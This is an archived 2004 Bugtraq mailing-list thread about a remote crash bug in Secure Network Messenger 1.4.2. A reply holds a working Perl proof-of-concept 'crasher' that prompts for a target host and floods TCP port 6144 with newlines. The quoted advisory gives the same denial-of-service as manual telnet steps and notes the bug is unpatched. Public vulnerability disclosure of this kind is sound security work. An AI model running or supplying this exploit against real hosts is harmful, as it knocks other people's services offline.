Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re: Crash in Secure Network Messenger 1.4.2
From: "r`Futile" <clearscreen () lycantrope com>
Date: Sat, 13 Nov 2004 23:54:54 +0100
And here is my proof of concept:

#!/usr/bin/perl

use IO::Socket;
print ("\nSecure Network Messenger Crasher by ClearScreen\n");
print ("\nEnter host to crash: ");
$h = <STDIN>;
chomp $h;
$socks = IO::Socket::INET->new(
       Proto => "tcp",
       PeerPort => "6144",
       PeerAddr => "$h"
) or die "\nNo response from host.";

sleep 1;
print "\nSuccesfully connected to $h!\n";
for ($count=1; $count<15; $count++)
{
print $socks "\n";
select(undef, undef, undef, 0.1);
}
print "\nMessenger crashed.";
close $socks;

Greetz, clearscreen :)
----- Original Message ----- From: "Luigi Auriemma" <aluigi () autistici org> To: <bugtraq () securityfocus com>; <bugs () securitytracker com>; <news () securiteam com>; <full-disclosure () lists netsys com>; <vuln () secunia com> 
Sent: Friday, November 12, 2004 9:52 PM
Subject: Crash in Secure Network Messenger 1.4.2




#######################################################################

                            Luigi Auriemma

Application:  Secure Network Messenger
             http://www.networkmessengers.com/msg/
Versions:     <= 1.4.2
Platforms:    Windows
Bug:          crash
Exploitation: remote
Date:         12 November 2004
Author:       Luigi Auriemma
             e-mail: aluigi () altervista org
             web:    http://aluigi.altervista.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Secure Network Messenger is a LAN messenger for Windows for exchanging
encrypted messages and files.


#######################################################################

======
2) Bug
======


Is possible to crash the program sending malformed data.


#######################################################################

===========
3) The Code
===========


Launch a telnet client and connect to the victim host on port 6144.
Now press RETURN about 10 times or more.
Disconnect, reconnect again and press RETURN.
The remote host should be crashed.


#######################################################################

======
4) Fix
======


No fix.
Over one month ago the developers said that they had to fix this bug
soon... no patch has been released yet.


#######################################################################
--- Luigi Auriemma 
http://aluigi.altervista.org

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]